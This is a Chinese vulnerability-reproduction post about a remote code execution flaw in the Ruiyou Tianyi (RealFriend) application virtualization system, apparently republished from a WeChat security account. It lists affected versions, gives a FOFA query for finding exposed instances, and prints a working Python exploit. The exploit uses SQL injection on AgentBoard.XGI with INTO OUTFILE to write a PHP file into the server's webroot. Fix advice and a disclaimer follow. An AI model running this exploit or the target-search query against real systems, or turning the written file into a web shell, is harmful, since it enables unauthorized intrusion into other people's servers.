一、漏洞描述
瑞友天翼应用虚拟化系统是具有自主知识产权,基于服务器计算(Server-based Computing)架构的应用虚拟化平台,该系统存在远程代码执行漏洞,恶意攻击者可以通过此漏洞进行任意执行操作。
二、漏洞影响
影响范围:5.x <= 瑞友天翼应用虚拟化系统 <= 7.0.2.1
不受影响:瑞友天翼应用虚拟化系统 >= 7.0.3.1
三、漏洞复现
1、fofa语法查找:title=“瑞友天翼-应用虚拟化系统”
2、使用漏洞检测脚本进行漏洞验证:
'''
SQL注入-->RCE EXP
瑞友天翼应用虚拟化系统RCE漏洞
影响版本
5.x<=version<=7.0.2.1
安全版本
version>=7.0.3.1
'''
import requests
import sys
url = sys.argv[1]
payload="/AgentBoard.XGI?user=-1%27+union+select+1%2C%27%3C%3Fphp+phpinfo%28%29%3B%3F%3E%27+into+outfile+%22C%3A%5C%5CProgram%5C+Files%5C+%5C%28x86%5C%29%5C%5CRealFriend%5C%5CRap%5C+Server%5C%5CWebRoot%5C%5C1.php%22+--+-&cmd=UserLogin"
repose = requests.get(url=url+payload)
if repose.status_code ==200:
a = url + '1.php'
b = requests.get(url=a)
if b.status_code == 200:
print('[+] 漏洞存在,验证地址: {}1.php '.format(url))
3、验证使用结果
进行访问验证地址,成功返回配置信息
四、修复建议:
1、厂商尚未提供漏洞修补方案,请关注厂商主页及时更新:http://www.realor.cn;
2、非必要建议不要把该系统暴漏于公网。
原文始发于微信公众号(蚁剑安全实验室):【漏洞复现】瑞友天翼应用虚拟化系统RCE漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论